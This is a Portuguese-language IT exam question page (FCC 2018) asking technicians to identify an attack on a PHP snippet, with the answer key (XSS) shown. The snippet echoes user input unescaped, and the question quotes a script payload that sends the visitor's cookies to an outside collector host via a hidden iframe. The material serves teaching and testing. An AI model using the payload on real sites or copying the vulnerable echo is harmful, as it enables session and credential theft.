Pular para o conteúdo principal

Questão de Programação — Linguagens de programação — FCC 2018

ProgramaçãoLinguagens de programação
Código
fc050905
Banca
FCC
Órgão
TRT - 2ª REGIÃO (SP)
Ano
2018
Cargo
Técnico Judiciário - Tecnologia da Informação
Considere o trecho de programa PHP abaixo.<?phpsetcookie('PHPSSESID', 'meu_sid');setcookie('login', 'meu_login');setcookie('senha', 'minha_senha');echo $_GET['var'];?>Supondo que ao executar este trecho, um usuário passou como entrada:<script>document.write('<iframe width=1 height=1src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>')</script>cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.comUm Técnico de TI conclui corretamente que
  1. Ao trecho com a instrução echo imprime os dados passados pelo usuário, sem oferecer vulnerabilidades ao site alvo.
  2. Bnada ocorrerá, pois o usuário não poderia passar a entrada indicada.
  3. Co navegador, ao perceber que a entrada se trata de um script, encerrará o código sem executar o echo.
  4. Dtrata-se de um ataque do tipo XSS, pois com os dados de cookie é possível capturar senhas de e-mail.
  5. Etrata-se de um ataque do tipo SQL-Injection, pois o usuário invasor inseriu uma consulta que será enviada diretamente para o banco de dados relacional.
Revelar gabarito e comentário

GabaritoD — trata-se de um ataque do tipo XSS, pois com os dados de cookie é possível capturar senhas de e-mail.

Link permanente: /questoes/fc050905